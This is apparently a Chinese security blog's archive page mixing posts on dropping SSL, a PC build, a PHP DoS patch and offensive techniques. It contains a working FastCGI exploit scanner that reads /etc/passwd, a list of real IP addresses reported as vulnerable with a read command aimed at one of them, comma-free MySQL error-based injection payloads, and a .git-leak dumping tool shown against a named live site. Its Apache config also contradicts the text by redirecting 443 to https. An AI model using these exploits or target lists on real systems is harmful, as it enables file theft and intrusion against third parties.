博客停用SSL证书

上周兴冲冲地申请了个wosign的免费SSL证书,用在博客 https://www.lijiejie.com

用了几天之后,发现性能实在无法接受。启用SSL后页面访问明显变慢太多了。

而且在某些网络环境下,博客直接无法访问:比如北京比较坑爹的鹏博士宽带,或者移动4G环境。

SSL handshake耗费了太多时间,而加密网页还需要消耗额外的CPU资源。

无奈,只好又禁用了SSL,把所有https链接全部301重定向到http。待Google和百度重新收录。

如果主机在内地,网络和性能都不错,还是可以考虑在登录等敏感操作的功能上应用SSL的,避免敏感信息在网络中明文传输。

虽然选择了停用SSL,但毕竟搜索引擎已收录一些https页面。所以临时地,443端口对应的VirtualHost还必须保留SSLEngine启用状态。

以便进行urlRedirect.

blog_https_google

禁用SSL之后,发现博客访问起来又恢复顺畅了!

<VirtualHost *:443>
     ServerAdmin my[at]lijiejie.com
     ServerName www.lijiejie.com
     DocumentRoot /some_folder
     Redirect permanent / https://www.lijiejie.com/
     SSLEngine on
     SSLOptions +StrictRequire
     SSLCertificateFile /some_folder/www.lijiejie.com.crt
     SSLCertificateKeyFile /some_folder/www.lijiejie.com.key
     SSLCertificateChainFile /some_folder/1_root_bundle.crt
</VirtualHost>

<VirtualHost *:80>
     ServerAdmin my[at]lijiejie.com
     ServerName www.lijiejie.com
     DocumentRoot /some_folder

     #SSLEngine on
     #SSLOptions +StrictRequire
     #SSLCertificateFile /some_folder/www.lijiejie.com.crt
     #SSLCertificateKeyFile /some_folder/www.lijiejie.com.key
     #SSLCertificateChainFile /some_folder/1_root_bundle.crt

     <Directory /some_folder/>
        Options -Indexes
        AllowOverride All
        Order allow,deny
        allow from all
    </Directory>

</VirtualHost>

 

fastcgi文件读取漏洞python扫描脚本

fastcgi文件读取(代码执行)是个很老的漏洞,漏洞描述:  PHP FastCGI 的远程利用

利用该漏洞可读取系统文件,甚至有一定几率成功执行代码。  下载上述文章中提到的:  fcgi_exp

协议细节其实我已不关心,只需要一个python的扫描脚本。于是拿wireshark抓了下GaRY的程序,写一小段代码。

外网暴露9000端口的机器自然是非常非常少的,但内网可就说不定了。

import socket
import sys

def test_fastcgi(ip):
    sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM); sock.settimeout(5.0)
    sock.connect((ip, 9000))
    data = """
    01 01 00 01 00 08 00 00  00 01 00 00 00 00 00 00
    01 04 00 01 00 8f 01 00  0e 03 52 45 51 55 45 53 
    54 5f 4d 45 54 48 4f 44  47 45 54 0f 08 53 45 52 
    56 45 52 5f 50 52 4f 54  4f 43 4f 4c 48 54 54 50 
    2f 31 2e 31 0d 01 44 4f  43 55 4d 45 4e 54 5f 52
    4f 4f 54 2f 0b 09 52 45  4d 4f 54 45 5f 41 44 44
    52 31 32 37 2e 30 2e 30  2e 31 0f 0b 53 43 52 49 
    50 54 5f 46 49 4c 45 4e  41 4d 45 2f 65 74 63 2f 
    70 61 73 73 77 64 0f 10  53 45 52 56 45 52 5f 53
    4f 46 54 57 41 52 45 67  6f 20 2f 20 66 63 67 69
    63 6c 69 65 6e 74 20 00  01 04 00 01 00 00 00 00
    """
    data_s = ''
    for _ in data.split():
        data_s += chr(int(_,16))
    sock.send(data_s)
    try:
        ret = sock.recv(1024)
        if ret.find(':root:') > 0:
            print ret
            print '%s is vulnerable!' % ip
            return True
        else:
            return False
    except Exception, e:
        pass
            
    sock.close()


if __name__ == '__main__':
    if len(sys.argv) == 1:
        print sys.argv[0], '[ip]'
    else:
        test_fastcgi(sys.argv[1])

通过快速扫描9000端口,可以发现几个存在漏洞的机器:

110.164.68.137  is vul !
110.164.68.148  is vul !
110.164.68.149  is vul !
110.164.68.151  is vul !
110.164.68.154  is vul !
110.164.68.155  is vul !

fcgi_exp.exe read 110.164.68.137 9000 /etc/passwd

fastcgi.exp

我的装机清单2015-6-10

每个人对台式机的定位和预期用途不同,硬件选择有差异。

我主要看重的是计算能力。

以下是我的装机清单,仅供参考:

1.  CPU:             英特尔(Intel) 酷睿i7-4790k 22纳米 Haswell全新架构盒装CPU处理器         ¥2110.57

2. 主板:          微星(MSI) Z97 GAMING 3主板 (Intel Z97/LGA 1150)                     ¥847.43

3. 内存条:      金士顿(Kingston)骇客神条 Savage系列 DDR3 2400 8GB台式机内存 * 2               ¥758.00

4. 硬盘:          三星(SAMSUNG)850 EVO系列 250G 2.5英寸 SATA-3固态硬盘(MZ-75E250B/CN)       ¥654.00

5. 机箱:          游戏悍将(Game Demon)刀锋特战标准黑装 机箱 非对称设计 支持240水冷           ¥194.19

6. 显示器:       戴尔(DELL)S2340L 23英寸宽屏IPS镜面超窄边框液晶显示器(带HDMI)     ¥990.00

7. 电源:           游戏悍将(Game Demon)魔尊GP550M特效版 电源 80plus白金牌 单路12V输出45A 模组设计     ¥353.81

8. CPU风扇:  酷冷至尊(CoolerMaster)暴雪T4 CPU散热器(多平台/4热管/PWM温控/静音风扇/附带硅脂)             主板赠送

9. 音箱:           戴尔(Dell) AX210 USB立体声音箱         DELL显示器赠送

以上价格是最终价格,已经使用了京东优惠券。  以上整机的价格大约是5900元

键盘是以前常厂商赠送的,鼠标是旧的,一条HDMI线是小连送的。

因为我不需要玩大型游戏,没有买额外的显卡。 不需要保存太多大文件,也没有买机械硬盘。

安装win 8.1,开机只需7秒左右。

鲁大师性能测试:

ludashi

一开始装机并不顺利,感谢小连帮我安装布线,排除故障。 在京东买了两根8G内存条,一开始还有一根点不亮,目前已经换货拿到了新的内存条。

Ubuntu安装php5.6.9免疫Multipart/form-data远程拒绝服务漏洞

最近百度的同学liushusheng[at]baidu.com向php反馈了一个 Multipart/form-data 远程拒绝服务 的安全漏洞。

攻击者可以构造并持续发送畸形HTTP请求,恶意占用系统资源。

简单测试,多线程持续发包,可以让一些性能较低的网站延长响应时间,甚至是直接出错。在我的测试机上,一旦攻击开始,CPU占用率会很快飙升至99%。

从下图可以看到,cpu一栏,占用率是很高的。(我的VPS是8 vcpu)

php-dos

最新释出的 php 5.6.9(2015.5.14) 已经修复了这个问题。

虽然攻击过程必须持续发包,并且性能好的服务器很难被打挂,但仍然大家建议更新修复这个问题。

我在自己vps上更新了php 5.6.9(配合apache),简单记录一下基本的操作步骤:

php -v     #可以先检查下自己当前的版本

apt-get install libxml2-dev

apt-get install apache2-dev

wget http://cn2.php.net/distributions/php-5.6.9.tar.bz2

tar -xvf php-5.6.9.tar.bz2

cd php-5.6.9/

which apxs    # 确认找到apxs的路径

./configure --with-apxs2=`which apxs` --with-mysql

make

make install

php -v    #再次检查php的版本

cp .libs/libphp5.so /usr/lib/apache2/modules/

service apache2 restart

重启apache之后,php的版本已经变成了5.6.9

php.ver

再次测试,cpu占用率已经降低了:

php.5.6.9.test

升级后发现,匿名用户访问博客首页,显示空白,但已登录的用户却不受影响。

说明是受缓存影响。 于是到 WP Super Cache插件 页面重新生成缓存,点击页面上的“更新按钮”即可。

随后再刷新,首页已经可以匿名访问了。

 

参考链接:

http://sec.baidu.com/index.php?research/detail/id/22

https://bugs.php.net/bug.php?id=69364

MySQL注射的过滤绕过技巧[3]

这一篇介绍不带逗号注入。 之所以不带逗号,多半是因为它被当做分隔符,或者是被脚本过滤了。比如这样一个URL:

http://www.target.com/index.php?cate=1,2,3,4,5

参数cate可以注入,但是不能使用逗号,因为逗号被脚本作为分隔符预处理。

这种注射点的利用方法是使用数学运算函数在子查询中报错,比如exp函数(参考 EXP(X) ),  MySQL会把子查询的中间结果暴露出来。

这里我发了一个例子到wooyun:  17173游戏某站点MySQL报错注入(不带逗号注入的猜解过程)

select exp(~(select*from(select user())a))

MySQL报错:

mysql> select exp(~(select*from(select user())a));
ERROR 1690 (22003): DOUBLE value is out of range in ‘exp(~((select ‘root@localhost’ from dual)))’

这样我们就得到了当前user()是root@localhost。

exp(x)函数的作用: 取常数e的x次方,其中,e是自然对数的底。

~x 是一个一元运算符,将x按位取补。举个例子:

mysql> select hex(2);
+——–+
| hex(2) |
+——–+
| 2 |
+——–+

mysql> select hex(~2);
+——————+
| hex(~2) |
+——————+
| FFFFFFFFFFFFFFFD |
+——————+

这条查询会出错,是因为exp(x)的参数x过大,超过了数值范围。分解到子查询,就是:

1. (select*from(select user())a) 得到字符串 root@localhost

2. 表达式’root@localhost’被转换为0,按位取补之后得到一个非常的大数,它是MySQL中最大的无符号整数:

mysql> select ~0;
+———————-+
| ~0 |
+———————-+
| 18446744073709551615 |
+———————-+

3. exp无法计算e的18446744073709551615次方,最终报错,但是MySQL把前面 1) 中子查询的临时结果暴露出来了

了解了MySQL的这个特点,其实我们就还可以精心构造其他的一元运算符,让MySQL查询在没有逗号的情况下报错,比如:

mysql> select !(select*from(select user())x)-~0;
ERROR 1690 (22003): BIGINT UNSIGNED value is out of range in ‘((not((select ‘root@localhost’ from dual))) – ~(0))’

mysql> select 1 – 18446744073709551615;
ERROR 1690 (22003): BIGINT UNSIGNED value is out of range in ‘(1 – 18446744073709551615)’

原因如第二个查询所述。

这个例子是bigint超过数值范围,手法类似。

GitHack — 一个git泄露利用脚本

当前大量开发人员使用git进行版本控制,对站点自动部署。  如果配置不当,可能会将.git文件夹直接部署到线上环境。这就引起了git泄露漏洞。

GitHack是一个.git泄露利用脚本,通过泄露的.git文件夹下的文件,还原重建工程源代码。

渗透测试人员、攻击者,可以进一步审计代码,挖掘:文件上传,SQL注射等安全漏洞。

脚本的工作原理

  1. 解析.git/index文件,找到工程中所有的: ( 文件名,文件sha1 )
  2. 去.git/objects/ 文件夹下下载对应的文件
  3. zlib解压文件,按原始的目录结构写入源代码

它的优点

  1. 速度快,默认20个工作线程
  2. 尽量还原所有的源代码,缺失一部分文件不影响脚本工作
  3. 脚本不需要执行额外的git命令,All you need is python
  4. 脚本无需浏览目录

可能的改进

存在文件被gc打包到git\objects\pack的情况,稍后可测试下看能否直接获取并解压这个文件,还原源代码

用法示例

GitHack.py http://www.hoolai.com/.git/

执行中截图:

GitHack

执行结果:

GitHack_result

获取代码:https://github.com/lijiejie/GitHack

参考资料:

Git Index Formart

非常感谢 sbp 的 gin – a Git index file parser,脚本中使用了他的解析源代码,为适用python 2.x和Windows作了细微的改动